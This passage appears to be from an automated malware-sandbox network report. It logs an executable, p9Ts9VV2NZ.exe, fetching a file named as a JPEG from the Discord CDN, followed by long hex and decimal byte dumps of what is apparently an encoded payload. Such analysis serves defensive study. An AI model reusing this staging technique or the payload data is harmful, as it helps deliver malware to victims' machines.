                    2021-10-26 16:59:17 UTC976INData Raw: 39 20 32 32 34 20 31 36 32 20 31 37 32 20 32 32 34 20 31 36 33 20 31 35 32 20 32 32 34 20 31 36 32 20 31 37 31 20 32 32 34 20 31 36 32 20 31 39 30 20 32 32 34 20 31 36 33 20 31 34 30 20 32 32 34 20 31 36 32 20 31 39 30 20 32 32 34 20 31 36 33 20 31 32 39 20 32 32 34 20 31 36 33 20 31 34 31 20 32 32 34 20 31 36 33 20 31 35 38 20 32 32 34 20 31 36 32 20 31 36 35 20 30 20 32 32 34 20 31 36 32 20 31 35 32 20 32 32 34 20 31 36 32 20 31 33 37 20 32 32 34 20 31 36 32 20 31 38 30 20 32 32 34 20 31 36 32 20 31 34 37 20 32 32 34 20 31 36 32 20 31 36 36 20 32 32 34 20 31 36 32 20 31 34 30 20 32 32 34 20 31 36 31 20 31 38 36 20 32 32 34 20 31 36 31 20 31 38 37 20 32 32 34 20 31 36 32 20 31 36 38 20 32 32 34 20 31 36 32 20 31 36 35 20 32 32 34 20 31 36 32 20 31 36 34
                    Data Ascii: 9 224 162 172 224 163 152 224 162 171 224 162 190 224 163 140 224 162 190 224 163 129 224 163 141 224 163 158 224 162 165 0 224 162 152 224 162 137 224 162 180 224 162 147 224 162 166 224 162 140 224 161 186 224 161 187 224 162 168 224 162 165 224 162 164
                    2021-10-26 16:59:17 UTC992INData Raw: 32 32 35 20 31 34 36 20 31 34 36 20 32 32 35 20 31 34 35 20 31 38 30 20 32 32 35 20 31 34 35 20 31 37 35 20 32 32 35 20 31 34 35 20 31 37 37 20 32 32 35 20 31 34 35 20 31 38 30 20 32 32 35 20 31 34 35 20 31 37 33 20 32 32 35 20 31 34 36 20 31 36 30 20 32 32 35 20 31 34 36 20 31 36 31 20 32 32 35 20 31 34 36 20 31 36 32 20 32 32 35 20 31 34 35 20 31 37 33 20 30 20 32 32 36 20 31 34 35 20 31 38 31 20 32 32 36 20 31 34 35 20 31 37 37 20 32 32 36 20 31 34 35 20 31 38 35 20 32 32 36 20 31 34 36 20 31 36 33 20 32 32 36 20 31 34 36 20 31 36 34 20 32 32 36 20 31 34 35 20 31 38 36 20 32 32 36 20 31 34 35 20 31 38 31 20 32 32 36 20 31 34 35 20 31 38 30 20 32 32 36 20 31 34 36 20 31 37 38 20 32 32 36 20 31 34 36 20 31 38 31 20 32 32 36 20 31 34 35 20 31 38 35 20 32
                    Data Ascii: 225 146 146 225 145 180 225 145 175 225 145 177 225 145 180 225 145 173 225 146 160 225 146 161 225 146 162 225 145 173 0 226 145 181 226 145 177 226 145 185 226 146 163 226 146 164 226 145 186 226 145 181 226 145 180 226 146 178 226 146 181 226 145 185 2


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.349692162.159.129.233443C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    TimestampkBytes transferredDirectionData
                    2021-10-26 16:59:17 UTC1000OUTGET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1
                    Host: cdn.discordapp.com
                    2021-10-26 16:59:18 UTC1001INHTTP/1.1 200 OK
                    Date: Tue, 26 Oct 2021 16:59:18 GMT
                    Content-Type: image/jpeg
                    Content-Length: 754681
                    Connection: close
                    CF-Ray: 6a453bfd6b695c56-FRA
                    Accept-Ranges: bytes
                    Age: 1029
                    Cache-Control: public, max-age=31536000
                    ETag: "67627ddafc6ba2588faf0c788dec6e85"
                    Expires: Wed, 26 Oct 2022 16:59:18 GMT
                    Last-Modified: Mon, 11 Oct 2021 18:16:48 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Cf-Bgj: h2pri
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633976208346288
                    x-goog-hash: crc32c=75c5bQ==
                    x-goog-hash: md5=Z2J92vxroliPrwx4jexuhQ==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 754681
                    X-GUploader-UploadID: ADPycdvoLYZ1NnA4WezzLEAzmJeNwJypM6fQ7yCecEsDt16F8bBFv5AcwUjNmUn-Eji2KLbxk0rJIeeBQxG8hUHphfQ
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0tyxRom%2BAlb1O%2Fj3sPD7eRIhBEoWsB%2Bcv4MFloQqn3JCsjp%2FHKuXYNt11BKZivFGVcVQ%2BVZA6rHlvgXDw%2BmDcSASs922g%2FqN0jaRSMalcKPI8bpebbCEuFO5MDLlSL9Um7p%2BHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    2021-10-26 16:59:18 UTC1002INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                    2021-10-26 16:59:18 UTC1002INData Raw: 20 31 33 35 20 31 34 32 20 32 32 38 20 31 33 34 20 31 37 33 20 32 32 38 20 31 33 34 20 31 37 32 20 32 32 38 20 31 33 35 20 31 33 32 20 32 32 38 20 31 33 35 20 31 38 30 20 32 32 38 20 31 33 35 20 31 33 30 20 32 32 38 20 31 33 35 20 31 36 37 20 32 32 38 20 31 33 34 20 31 37 37 20 32 32 38 20 31 33 35 20 31 37 31 20 32 32 38 20 31 33 35 20 31 35 38 20 32 32 38 20 31 33 34 20 31 37 34 20 32 32 38 20 31 33 34 20 31 37 38 20 30 20 32 32 38 20 31 34 31 20 31 33 33 20 32 32 38 20 31 34 31 20 31 38 32 20 32 32 38 20 31 34 31 20 31 33 37 20 32 32 38 20 31 34 32 20 31 33 33 20 32 32 38 20 31 34 31 20 31 38 35 20 32 32 38 20 31 34 31 20 31 36 33 20 32 32 38 20 31 34 31 20 31 33 32 20 32 32 38 20 31 34 31 20 31 34 37 20 32 32 38 20 31 34 31 20 31 38 30 20 32 32 38 20
                    Data Ascii: 135 142 228 134 173 228 134 172 228 135 132 228 135 180 228 135 130 228 135 167 228 134 177 228 135 171 228 135 158 228 134 174 228 134 178 0 228 141 133 228 141 182 228 141 137 228 142 133 228 141 185 228 141 163 228 141 132 228 141 147 228 141 180 228
                    2021-10-26 16:59:18 UTC1003INData Raw: 36 20 31 36 30 20 31 35 33 20 32 33 36 20 31 36 31 20 31 33 37 20 32 33 36 20 31 36 31 20 31 33 36 20 32 33 36 20 31 36 30 20 31 35 39 20 32 33 36 20 31 36 30 20 31 38 34 20 32 33 36 20 31 36 31 20 31 35 38 20 32 33 36 20 31 36 31 20 31 35 37 20 32 33 36 20 31 36 30 20 31 37 38 20 30 20 32 33 38 20 31 36 37 20 31 37 37 20 32 33 38 20 31 36 38 20 31 35 37 20 32 33 38 20 31 36 38 20 31 37 38 20 32 33 38 20 31 36 37 20 31 37 39 20 32 33 38 20 31 36 38 20 31 34 30 20 32 33 38 20 31 36 38 20 31 36 36 20 32 33 38 20 31 36 37 20 31 37 39 20 32 33 38 20 31 36 37 20 31 37 34 20 32 33 38 20 31 36 37 20 31 38 30 20 32 33 38 20 31 36 38 20 31 35 38 20 32 33 38 20 31 36 38 20 31 38 30 20 32 33 38 20 31 36 37 20 31 37 34 20 32 33 38 20 31 36 37 20 31 37 32 20 32 33 38
                    Data Ascii: 6 160 153 236 161 137 236 161 136 236 160 159 236 160 184 236 161 158 236 161 157 236 160 178 0 238 167 177 238 168 157 238 168 178 238 167 179 238 168 140 238 168 166 238 167 179 238 167 174 238 167 180 238 168 158 238 168 180 238 167 174 238 167 172 238
                    2021-10-26 16:59:18 UTC1005INData Raw: 20 32 32 34 20 31 36 35 20 31 35 36 20 32 32 34 20 31 36 35 20 31 36 37 20 32 32 34 20 31 36 35 20 31 32 38 20 32 32 34 20 31 36 35 20 31 38 39 20 32 32 34 20 31 36 35 20 31 32 39 20 32 32 34 20 31 36 35 20 31 32 38 20 32 32 34 20 31 36 35 20 31 37 39 20 32 32 34 20 31 36 35 20 31 34 35 20 32 32 34 20 31 36 35 20 31 36 33 20 32 32 34 20 31 36 35 20 31 37 37 20 32 32 34 20 31 36 35 20 31 35 35 20 32 32 34 20 31 36 35 20 31 33 31 20 32 32 34 20 31 36 35 20 31 38 30 20 32 32 34 20 31 36 35 20 31 33 33 20 32 32 34 20 31 36 35 20 31 37 39 20 30 20 32 33 38 20 31 38 37 20 31 36 33 20 32 33 38 20 31 38 36 20 31 37 35 20 32 33 38 20 31 38 37 20 31 36 32 20 32 33 38 20 31 38 37 20 31 36 31 20 32 33 38 20 31 38 36 20 31 38 32 20 32 33 38 20 31 38 36 20 31 37 37 20
                    Data Ascii: 224 165 156 224 165 167 224 165 128 224 165 189 224 165 129 224 165 128 224 165 179 224 165 145 224 165 163 224 165 177 224 165 155 224 165 131 224 165 180 224 165 133 224 165 179 0 238 187 163 238 186 175 238 187 162 238 187 161 238 186 182 238 186 177
                    2021-10-26 16:59:18 UTC1006INData Raw: 39 20 32 33 39 20 31 37 34 20 31 37 31 20 32 33 39 20 31 37 34 20 31 33 33 20 32 33 39 20 31 37 33 20 31 38 30 20 32 33 39 20 31 37 34 20 31 37 35 20 32 33 39 20 31 37 33 20 31 38 35 20 32 33 39 20 31 37 34 20 31 38 34 20 32 33 39 20 31 37 33 20 31 38 30 20 30 20 32 33 34 20 31 38 35 20 31 37 39 20 32 33 34 20 31 38 35 20 31 38 30 20 32 33 34 20 31 38 35 20 31 37 39 20 32 33 34 20 31 38 35 20 31 33 33 20 32 33 34 20 31 38 35 20 31 36 34 20 32 33 34 20 31 38 35 20 31 35 31 20 32 33 34 20 31 38 35 20 31 35 30 20 32 33 34 20 31 38 35 20 31 36 38 20 32 33 34 20 31 38 35 20 31 33 33 20 32 33 34 20 31 38 35 20 31 38 32 20 32 33 34 20 31 38 35 20 31 32 38 20 32 33 34 20 31 38 35 20 31 33 36 20 32 33 34 20 31 38 35 20 31 32 38 20 32 33 34 20 31 38 36 20 31 33 37
                    Data Ascii: 9 239 174 171 239 174 133 239 173 180 239 174 175 239 173 185 239 174 184 239 173 180 0 234 185 179 234 185 180 234 185 179 234 185 133 234 185 164 234 185 151 234 185 150 234 185 168 234 185 133 234 185 182 234 185 128 234 185 136 234 185 128 234 186 137
                    2021-10-26 16:59:18 UTC1007INData Raw: 20 31 37 34 20 32 33 32 20 31 35 31 20 31 36 30 20 32 33 32 20 31 35 30 20 31 38 31 20 32 33 32 20 31 35 30 20 31 37 38 20 32 33 32 20 31 35 31 20 31 32 38 20 32 33 32 20 31 35 30 20 31 37 39 20 32 33 32 20 31 35 30 20 31 38 30 20 32 33 32 20 31 35 30 20 31 37 35 20 32 33 32 20 31 35 30 20 31 37 37 20 32 33 32 20 31 35 31 20 31 38 31 20 30 20 32 33 33 20 31 35 33 20 31 33 30 20 32 33 33 20 31 35 32 20 31 38 35 20 32 33 33 20 31 35 32 20 31 35 34 20 32 33 33 20 31 35 32 20 31 35 38 20 32 33 33 20 31 35 32 20 31 35 34 20 32 33 33 20 31 35 32 20 31 33 39 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 33 36 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 33 33 20 32 33 33 20 31 35 32 20
                    Data Ascii: 174 232 151 160 232 150 181 232 150 178 232 151 128 232 150 179 232 150 180 232 150 175 232 150 177 232 151 181 0 233 153 130 233 152 185 233 152 154 233 152 158 233 152 154 233 152 139 233 152 183 233 152 136 233 152 183 233 152 183 233 152 133 233 152
                    2021-10-26 16:59:18 UTC1009INData Raw: 33 20 31 34 34 20 32 33 33 20 31 37 33 20 31 38 31 20 30 20 32 33 33 20 31 37 37 20 31 33 30 20 32 33 33 20 31 37 37 20 31 34 36 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 38 31 20 32 33 33 20 31 37 37 20 31 33 37 20 32 33 33 20 31 37 37 20 31 33 34 20 32 33 33 20 31 37 37 20 31 35 37 20 32 33 33 20 31 37 37 20 31 36 36 20 32 33 33 20 31 37 37 20 31 33 30 20 32 33 33 20 31 37 37 20 31 37 39 20 32 33 33 20 31 37 38 20 31 32 39 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 33 37 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 38 31 20 30 20 32 33 33 20 31 38 32 20 31 33 39 20 32 33 33 20 31 38 32 20 31 38 35 20 32 33 33 20 31 38 32 20 31 33 39 20 32 33 33 20 31 38 32 20 31 36 33 20 32 33 33 20 31
                    Data Ascii: 3 144 233 173 181 0 233 177 130 233 177 146 233 177 133 233 177 181 233 177 137 233 177 134 233 177 157 233 177 166 233 177 130 233 177 179 233 178 129 233 177 133 233 177 137 233 177 133 233 177 181 0 233 182 139 233 182 185 233 182 139 233 182 163 233 1
                    2021-10-26 16:59:18 UTC1010INData Raw: 20 31 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 38 32 20 32 32 36 20 31 33 37 20 31 33 34 20 32 32 36 20 31 33 37 20 31 33 31 20 32 32 36 20 31 33 37 20 31 33 32 20 32 32 36 20 31 33 37 20 31 33 31 20 32 32 36 20 31 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 38 32 20 30 20 32 33 30 20 31 34 31 20 31 36 34 20 32 33 30 20 31 34 30 20 31 38 32 20 32 33 30 20 31 34 30 20 31 38 32 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 31 20 31 34 37 20 32 33 30 20 31 34 31 20 31 35 30 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 30 20 31 37 37 20 32 33 30 20 31 34 30 20 31 37 35 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 31 20 31 33 30 20 32 33 30 20 31 34 30 20 31 37 37 20 32 33 30 20
                    Data Ascii: 137 136 226 137 136 226 137 182 226 137 134 226 137 131 226 137 132 226 137 131 226 137 136 226 137 182 0 230 141 164 230 140 182 230 140 182 230 140 178 230 141 147 230 141 150 230 140 178 230 140 177 230 140 175 230 140 178 230 141 130 230 140 177 230
                    2021-10-26 16:59:18 UTC1011INData Raw: 30 20 31 37 30 20 31 38 32 20 30 20 32 32 38 20 31 37 34 20 31 36 31 20 32 32 38 20 31 37 34 20 31 33 34 20 32 32 38 20 31 37 34 20 31 33 36 20 32 32 38 20 31 37 34 20 31 37 35 20 32 32 38 20 31 37 33 20 31 37 35 20 32 32 38 20 31 37 33 20 31 37 37 20 32 32 38 20 31 37 34 20 31 34 34 20 32 32 38 20 31 37 33 20 31 38 32 20 32 32 38 20 31 37 33 20 31 38 33 20 32 32 38 20 31 37 33 20 31 38 32 20 32 32 38 20 31 37 33 20 31 37 37 20 32 32 38 20 31 37 34 20 31 36 34 20 32 32 38 20 31 37 34 20 31 37 36 20 32 32 38 20 31 37 33 20 31 38 30 20 32 32 38 20 31 37 33 20 31 38 32 20 30 20 32 33 33 20 31 37 34 20 31 36 34 20 32 33 33 20 31 37 33 20 31 37 39 20 32 33 33 20 31 37 33 20 31 38 32 20 32 33 33 20 31 37 33 20 31 38 32 20 32 33 33 20 31 37 34 20 31 33 34 20 32
                    Data Ascii: 0 170 182 0 228 174 161 228 174 134 228 174 136 228 174 175 228 173 175 228 173 177 228 174 144 228 173 182 228 173 183 228 173 182 228 173 177 228 174 164 228 174 176 228 173 180 228 173 182 0 233 174 164 233 173 179 233 173 182 233 173 182 233 174 134 2
                    2021-10-26 16:59:18 UTC1013INData Raw: 20 32 33 39 20 31 38 38 20 31 38 31 20 32 33 39 20 31 38 37 20 31 38 33 20 32 33 39 20 31 38 38 20 31 39 31 20 32 33 39 20 31 38 38 20 31 37 31 20 32 33 39 20 31 38 37 20 31 39 31 20 32 33 39 20 31 38 37 20 31 38 35 20 32 33 39 20 31 38 38 20 31 39 30 20 32 33 39 20 31 38 37 20 31 38 32 20 30 20 32 32 39 20 31 32 39 20 31 34 32 20 32 32 39 20 31 32 39 20 31 35 32 20 32 32 39 20 31 32 39 20 31 33 39 20 32 32 39 20 31 32 39 20 31 36 31 20 32 32 39 20 31 33 30 20 31 34 30 20 32 32 39 20 31 32 39 20 31 33 37 20 32 32 39 20 31 32 39 20 31 33 38 20 32 32 39 20 31 32 39 20 31 38 37 20 32 32 39 20 31 32 39 20 31 38 35 20 32 32 39 20 31 32 39 20 31 34 31 20 32 32 39 20 31 32 39 20 31 33 33 20 32 32 39 20 31 32 39 20 31 37 32 20 32 32 39 20 31 32 39 20 31 38 32 20
                    Data Ascii: 239 188 181 239 187 183 239 188 191 239 188 171 239 187 191 239 187 185 239 188 190 239 187 182 0 229 129 142 229 129 152 229 129 139 229 129 161 229 130 140 229 129 137 229 129 138 229 129 187 229 129 185 229 129 141 229 129 133 229 129 172 229 129 182
                    2021-10-26 16:59:18 UTC1014INData Raw: 33 20 30 20 32 32 34 20 31 37 30 20 31 33 34 20 32 32 34 20 31 37 30 20 31 36 36 20 32 32 34 20 31 36 39 20 31 38 30 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20 31 36 39 20 31 38 32 20 32 32 34 20 31 37 30 20 31 36 39 20 32 32 34 20 31 37 30 20 31 37 38 20 32 32 34 20 31 36 39 20 31 38 33 20 32 32 34 20 31 37 30 20 31 36 35 20 32 32 34 20 31 37 30 20 31 35 34 20 32 32 34 20 31 37 30 20 31 35 32 20 32 32 34 20 31 36 39 20 31 38 33 20 32 32 34 20 31 36 39 20 31 38 30 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20 31 36 39 20 31 38 33 20 30 20 32 33 36 20 31 36 39 20 31 35 31 20 32 33 36 20 31 36 39 20 31 36 37 20 32 33 36 20 31 37 30 20 31 33 31 20 32 33 36 20 31 36 39 20 31 34 34 20 32 33 36 20 31 37 30 20 31 32 39 20 32 33 36 20 31 36 39 20 31
                    Data Ascii: 3 0 224 170 134 224 170 166 224 169 180 224 169 181 224 169 182 224 170 169 224 170 178 224 169 183 224 170 165 224 170 154 224 170 152 224 169 183 224 169 180 224 169 181 224 169 183 0 236 169 151 236 169 167 236 170 131 236 169 144 236 170 129 236 169 1
                    2021-10-26 16:59:18 UTC1015INData Raw: 20 31 33 32 20 32 33 31 20 31 34 33 20 31 33 31 20 32 33 31 20 31 34 33 20 31 38 34 20 30 20 32 33 32 20 31 34 35 20 31 33 31 20 32 33 32 20 31 34 34 20 31 33 36 20 32 33 32 20 31 34 34 20 31 38 34 20 32 33 32 20 31 34 34 20 31 38 36 20 32 33 32 20 31 34 34 20 31 37 33 20 32 33 32 20 31 34 34 20 31 33 38 20 32 33 32 20 31 34 34 20 31 38 36 20 32 33 32 20 31 34 34 20 31 34 31 20 32 33 32 20 31 34 35 20 31 33 33 20 32 33 32 20 31 34 34 20 31 38 35 20 32 33 32 20 31 34 34 20 31 33 36 20 32 33 32 20 31 34 34 20 31 38 33 20 32 33 32 20 31 34 34 20 31 33 34 20 32 33 32 20 31 34 34 20 31 38 33 20 32 33 32 20 31 34 34 20 31 38 34 20 30 20 32 32 36 20 31 35 30 20 31 39 31 20 32 32 36 20 31 35 30 20 31 39 31 20 32 32 36 20 31 35 30 20 31 38 37 20 32 32 36 20 31 35
                    Data Ascii: 132 231 143 131 231 143 184 0 232 145 131 232 144 136 232 144 184 232 144 186 232 144 173 232 144 138 232 144 186 232 144 141 232 145 133 232 144 185 232 144 136 232 144 183 232 144 134 232 144 183 232 144 184 0 226 150 191 226 150 191 226 150 187 226 15
                    2021-10-26 16:59:18 UTC1017INData Raw: 31 37 35 20 31 33 32 20 32 32 34 20 31 37 35 20 31 34 36 20 32 32 34 20 31 37 35 20 31 37 38 20 32 32 34 20 31 37 35 20 31 37 38 20 32 32 34 20 31 37 36 20 31 33 34 20 32 32 34 20 31 37 36 20 31 33 38 20 32 32 34 20 31 37 35 20 31 33 32 20 32 32 34 20 31 37 35 20 31 38 33 20 32 32 34 20 31 37 36 20 31 33 32 20 32 32 34 20 31 37 35 20 31 38 34 20 30 20 32 33 36 20 31 37 38 20 31 38 33 20 32 33 36 20 31 37 37 20 31 38 30 20 32 33 36 20 31 37 38 20 31 36 39 20 32 33 36 20 31 37 38 20 31 34 35 20 32 33 36 20 31 37 38 20 31 34 38 20 32 33 36 20 31 37 38 20 31 36 36 20 32 33 36 20 31 37 37 20 31 38 35 20 32 33 36 20 31 37 37 20 31 38 38 20 32 33 36 20 31 37 38 20 31 37 32 20 32 33 36 20 31 37 37 20 31 38 36 20 32 33 36 20 31 37 37 20 31 38 34 20 32 33 36 20 31
                    Data Ascii: 175 132 224 175 146 224 175 178 224 175 178 224 176 134 224 176 138 224 175 132 224 175 183 224 176 132 224 175 184 0 236 178 183 236 177 180 236 178 169 236 178 145 236 178 148 236 178 166 236 177 185 236 177 188 236 178 172 236 177 186 236 177 184 236 1
                    2021-10-26 16:59:18 UTC1018INData Raw: 20 31 35 32 20 31 32 38 20 32 33 36 20 31 35 31 20 31 38 35 20 30 20 32 33 32 20 31 35 35 20 31 35 34 20 32 33 32 20 31 35 35 20 31 37 31 20 32 33 32 20 31 35 34 20 31 38 33 20 32 33 32 20 31 35 35 20 31 39 31 20 32 33 32 20 31 35 35 20 31 37 36 20 32 33 32 20 31 35 35 20 31 37 33 20 32 33 32 20 31 35 35 20 31 36 31 20 32 33 32 20 31 35 34 20 31 38 38 20 32 33 32 20 31 35 35 20 31 34 32 20 32 33 32 20 31 35 34 20 31 39 30 20 32 33 32 20 31 35 35 20 31 36 38 20 32 33 32 20 31 35 35 20 31 36 38 20 32 33 32 20 31 35 35 20 31 34 32 20 32 33 32 20 31 35 35 20 31 36 39 20 32 33 32 20 31 35 34 20 31 38 35 20 30 20 32 32 34 20 31 36 39 20 31 33 36 20 32 32 34 20 31 36 39 20 31 33 31 20 32 32 34 20 31 36 39 20 31 33 33 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32
                    Data Ascii: 152 128 236 151 185 0 232 155 154 232 155 171 232 154 183 232 155 191 232 155 176 232 155 173 232 155 161 232 154 188 232 155 142 232 154 190 232 155 168 232 155 168 232 155 142 232 155 169 232 154 185 0 224 169 136 224 169 131 224 169 133 224 169 181 22
                    2021-10-26 16:59:18 UTC1019INData Raw: 32 33 33 20 31 38 38 20 31 33 37 20 32 33 33 20 31 38 38 20 31 35 39 20 32 33 33 20 31 38 38 20 31 38 38 20 32 33 33 20 31 38 38 20 31 35 36 20 32 33 33 20 31 38 38 20 31 34 34 20 32 33 33 20 31 38 38 20 31 37 31 20 32 33 33 20 31 38 38 20 31 33 36 20 32 33 33 20 31 38 39 20 31 32 39 20 32 33 33 20 31 38 38 20 31 38 35 20 30 20 32 32 35 20 31 32 39 20 31 33 33 20 32 32 35 20 31 32 39 20 31 33 39 20 32 32 35 20 31 32 39 20 31 37 33 20 32 32 35 20 31 32 39 20 31 36 34 20 32 32 35 20 31 32 39 20 31 33 35 20 32 32 35 20 31 32 39 20 31 38 33 20 32 32 35 20 31 32 39 20 31 36 33 20 32 32 35 20 31 32 39 20 31 38 31 20 32 32 35 20 31 32 39 20 31 39 31 20 32 32 35 20 31 32 39 20 31 38 36 20 32 32 35 20 31 32 39 20 31 33 32 20 32 32 35 20 31 32 39 20 31 33 37 20 32
                    Data Ascii: 233 188 137 233 188 159 233 188 188 233 188 156 233 188 144 233 188 171 233 188 136 233 189 129 233 188 185 0 225 129 133 225 129 139 225 129 173 225 129 164 225 129 135 225 129 183 225 129 163 225 129 181 225 129 191 225 129 186 225 129 132 225 129 137 2
                    2021-10-26 16:59:18 UTC1021INData Raw: 20 32 33 33 20 31 34 34 20 31 38 36 20 30 20 32 33 32 20 31 35 33 20 31 36 39 20 32 33 32 20 31 35 33 20 31 37 30 20 32 33 32 20 31 35 32 20 31 38 36 20 32 33 32 20 31 35 33 20 31 36 37 20 32 33 32 20 31 35 33 20 31 34 38 20 32 33 32 20 31 35 32 20 31 39 30 20 32 33 32 20 31 35 33 20 31 35 33 20 32 33 32 20 31 35 32 20 31 38 36 20 32 33 32 20 31 35 33 20 31 37 39 20 32 33 32 20 31 35 32 20 31 38 35 20 32 33 32 20 31 35 33 20 31 36 37 20 32 33 32 20 31 35 33 20 31 37 31 20 32 33 32 20 31 35 32 20 31 38 35 20 32 33 32 20 31 35 33 20 31 38 37 20 32 33 32 20 31 35 32 20 31 38 36 20 30 20 32 33 39 20 31 35 35 20 31 37 30 20 32 33 39 20 31 35 36 20 31 32 39 20 32 33 39 20 31 35 35 20 31 36 32 20 32 33 39 20 31 35 35 20 31 37 34 20 32 33 39 20 31 35 34 20 31 38
                    Data Ascii: 233 144 186 0 232 153 169 232 153 170 232 152 186 232 153 167 232 153 148 232 152 190 232 153 153 232 152 186 232 153 179 232 152 185 232 153 167 232 153 171 232 152 185 232 153 187 232 152 186 0 239 155 170 239 156 129 239 155 162 239 155 174 239 154 18
                    2021-10-26 16:59:18 UTC1022INData Raw: 31 39 30 20 32 32 39 20 31 32 39 20 31 37 30 20 32 32 39 20 31 32 38 20 31 38 32 20 32 32 39 20 31 32 38 20 31 38 38 20 32 32 39 20 31 32 39 20 31 34 34 20 32 32 39 20 31 32 39 20 31 35 35 20 32 32 39 20 31 32 39 20 31 37 38 20 32 32 39 20 31 32 39 20 31 36 37 20 32 32 39 20 31 32 38 20 31 38 37 20 30 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 36 35 20 32 33 39 20 31 33 32 20 31 34 31 20 32 33 39 20 31 33 32 20 31 38 38 20 32 33 39 20 31 33 32 20 31 38 38 20 32 33 39 20 31 33 32 20 31 34 36 20 32 33 39 20 31 33 33 20 31 32 38 20 32 33 39 20 31 33 32 20 31 38 39 20 32 33 39 20 31 33 32 20 31 34 36 20 32 33 39 20 31 33 33 20 31 34 32 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31
                    Data Ascii: 190 229 129 170 229 128 182 229 128 188 229 129 144 229 129 155 229 129 178 229 129 167 229 128 187 0 239 132 190 239 132 165 239 132 141 239 132 188 239 132 188 239 132 146 239 133 128 239 132 189 239 132 146 239 133 142 239 132 190 239 132 190 239 132 1
                    2021-10-26 16:59:18 UTC1023INData Raw: 20 31 38 37 20 30 20 32 33 30 20 31 35 31 20 31 37 36 20 32 33 30 20 31 35 31 20 31 34 32 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 34 33 20 32 33 30 20 31 35 31 20 31 35 33 20 32 33 30 20 31 35 31 20 31 38 39 20 32 33 30 20 31 35 31 20 31 34 32 20 32 33 30 20 31 35 31 20 31 38 36 20 32 33 30 20 31 35 31 20 31 38 39 20 32 33 30 20 31 35 31 20 31 36 33 20 32 33 30 20 31 35 31 20 31 37 34 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 33 39 20 32 33 30 20 31 35 31 20 31 38 37 20 30 20 32 33 36 20 31 35 33 20 31 36 35 20 32 33 36 20 31 35 32 20 31 37 37 20 32 33 36 20 31 35 33 20 31 37 32 20 32 33 36 20 31 35 33 20 31 33 37 20 32 33 36 20 31 35 32 20 31 37 38 20 32 33 36 20 31 35
                    Data Ascii: 187 0 230 151 176 230 151 142 230 151 140 230 151 143 230 151 153 230 151 189 230 151 142 230 151 186 230 151 189 230 151 163 230 151 174 230 151 140 230 151 140 230 151 139 230 151 187 0 236 153 165 236 152 177 236 153 172 236 153 137 236 152 178 236 15
                    2021-10-26 16:59:18 UTC1025INData Raw: 31 34 30 20 31 34 37 20 32 33 31 20 31 33 39 20 31 38 34 20 32 33 31 20 31 33 39 20 31 39 30 20 32 33 31 20 31 34 30 20 31 32 38 20 32 33 31 20 31 33 39 20 31 39 30 20 32 33 31 20 31 33 39 20 31 38 33 20 32 33 31 20 31 34 30 20 31 36 30 20 32 33 31 20 31 34 30 20 31 38 38 20 30 20 32 32 37 20 31 34 32 20 31 36 38 20 32 32 37 20 31 34 31 20 31 38 34 20 32 32 37 20 31 34 32 20 31 37 35 20 32 32 37 20 31 34 31 20 31 38 30 20 32 32 37 20 31 34 32 20 31 36 36 20 32 32 37 20 31 34 31 20 31 38 30 20 32 32 37 20 31 34 32 20 31 34 39 20 32 32 37 20 31 34 31 20 31 38 36 20 32 32 37 20 31 34 32 20 31 35 30 20 32 32 37 20 31 34 31 20 31 38 38 20 32 32 37 20 31 34 31 20 31 38 37 20 32 32 37 20 31 34 31 20 31 38 33 20 32 32 37 20 31 34 32 20 31 33 35 20 32 32 37 20 31
                    Data Ascii: 140 147 231 139 184 231 139 190 231 140 128 231 139 190 231 139 183 231 140 160 231 140 188 0 227 142 168 227 141 184 227 142 175 227 141 180 227 142 166 227 141 180 227 142 149 227 141 186 227 142 150 227 141 188 227 141 187 227 141 183 227 142 135 227 1
